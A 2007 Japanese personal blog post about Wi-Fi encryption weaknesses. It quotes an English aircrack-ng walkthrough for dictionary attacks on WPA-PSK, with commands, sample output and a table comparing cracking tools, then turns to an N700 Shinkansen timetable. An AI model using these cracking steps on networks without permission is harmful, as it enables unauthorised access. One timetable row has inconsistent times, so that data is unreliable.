第193回  パソコンのセキュリティー 2回目 [パソコン]

    今回はマジメなお話です。 多分・・・。                   てな感じでゴー


 


 今、ノートパソコンでワイヤレスLANが搭載されていない機種は無いといっても過言ではないでしょう。


 更にはワイアレスブロードバンドルーターも6000円台で手に入れる事が可能になったので、ワイヤレスLANを導入しない手はないでしょう。(ワイヤレスブロードバンドルーターならワイヤレス機能、ルーター機能、スイッチングHubの3っつの機能を持っているので正にお買い得でしょう)


 


 その大変便利なワイヤレスLANですがセキュリティーの要とも思われる暗号化Key(WEP、WPA、WPA2)が破られようとしています。 もっともWEPはもう完全に破られてしまいましたが・・・。


 


 


 


  上記がそれを証明しています。


 


  WPA2のKeyが破られるのも時間の問題でしょうか


 


  


 


  こんなソフトまで出ています(あくまでもTEST用だそうですが)


 


  ここから先は僕自身もパソコン言語には詳しくない為良くわかりませんがLinuxを用いて暗号を解読してしまうらしいです。


 


 (例)Dictionary attack (airoplay) (WPA-PSK)
Download dictionaries. i.e from http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
Make a dictionary.
# zcat all.gz | egrep -v '^#' > dic


If you do not have a handshake packet, you cannot continue, so you do aireplay -0 again.
# aircrack-ng -w dic -0 out.cap


Opening out.cap
Read 154839 packets.


   #  BSSID              ESSID                     Encryption


   1  00:A0:B0:40:5C:84  HOGE                      WPA (1 handshake)
   2  00:02:2D:C2:38:AF                            Unknown


Index number of target network ? 1


Once you find a handshake packet, you can stop airodump.
Yes, you find it! For this, I actually used Windows because my Linux is running an ancient Pentium II 300kHz! Only this process needs CPU power, so I used my Windows (Celeron 3GHz). It actually took less than three minutes, though.
 


--------------------------------------------------------------------------------


Note: In my experience, using Aircrack is the best tool compare to others. Aircrack on Linux supports packet injection which means we can increase the traffic, so we need only few hours to capture sufficient packets. Otherwise you will need several days.


Here is other my reports.


Tool OS CPU usage Encryption 802. NIC Support Packet injection My recommendation
Airsnort
(note) Windows High WEP 11b Few Not supported Low
Airsnort
(note) Linux High WEP 11b Few Not supported Low
Aircrack
(note) Windows Low WEP, WPA 11a/b/g Many Not supported Mid
Aircrack Linux Low WEP, WPA 11a/b/g Many Supported! Recommended


 


  あ~ 本当にハッカーは恐ろしい! あぁ恐ろしい!


  こんな事書いていてなんですがワイヤレスLANは最近ではウイルスソフトがパトロール機能が付いているものがほとんどなのでお逸るにはあたらずだと思います。


 


 いきなり話は逸れますが明日(2007年7月1日)に遂にN700系が誕生します。


 その予定時刻表です。


 新幹線N700系 のぞみ時刻表(2007年7月1日より)
 東京・品川発 新大阪・博多行
        .東京  品川 新横浜 .名古屋. 京都 新大阪 新神戸 岡山  広島  小倉着 博多着
のぞみ99号.                             //06:00→06:11→07:30→08:06→08:21→08:35→09:07→09:43→10:28→10:45
のぞみ1号  . 06:00→06:07→06:18→07:37→08:12→08:27→08:40→09:13→09:48→10:33→10:50
のぞみ107号.08:03→→.→→08:20→09:45→10:25→10:40着// (※2007年9月21日より)
のぞみ25号    11:50→11:58→12:10→13:34→14:12→14:29→14:42→15:14→15:50→16:35→16:52
のぞみ29号     12:50→12:58→13:10→14:34→15:12→15:29→15:42→16:15→16:52→14:39→17:57 (※2007年9月1日より)
のぞみ163号.21:20→21:27→21:38→22:57→23:32→23:45着//

△博多・新大阪発 東京行
        .博多  小倉  新山口 広島  福山  岡山 新神戸 新大阪 京都.名古屋.新横浜着.品川着.東京着
のぞみ100号                                        //06:00→06:14→06:50→08:08→08:19→08:26
のぞみ6号  .    07:17→07:36→07:55→08:28→→.→→09:05→09:38→09:53→10:09→10:47→12:10→12:22→12:30 (※2007年9月1日より)
のぞみ26号 12:28→12:44→→.→→13:30→→.→→14:06→14:38→14:53→15:09→15:47→17:10→17:22→17:30
のぞみ28号 12:50→13:07→13:26→14:00→14:25→14:42→15:15→15:30→15:46→16:25→17:47→17:59→18:06
のぞみ140号                                       //16:40→16:57→17:36→19:00→→.→→19:16 (※2007年9月21日より)
のぞみ52号 18:54→19:10→→.→→19:57→→.→→20:33→21:05→21:20→21:34→22:10→23:28→23:39→23:45


 


 かなり見づらくて大変恐縮ですが東京~新大阪がのぞみ1号を見てもらえばわかるように2時間27分と確かに短縮されています。 


 


       なんか今回も⇐ 今回もだろ! 脈絡のない話になってしまいましたm(-_-)m


 


 


    ~  振り子がブレたら  真ん中来て!   ”ちょいとハッスル!”    ~


 


 


と、誤魔化しつつガンバランスdeダンス


nice!(1)  コメント(0)  トラックバック(0) 

nice! 1

コメント 0

コメントの受付は締め切りました

トラックバック 0

この広告は前回の更新から一定期間経過したブログに表示されています。更新すると自動で解除されます。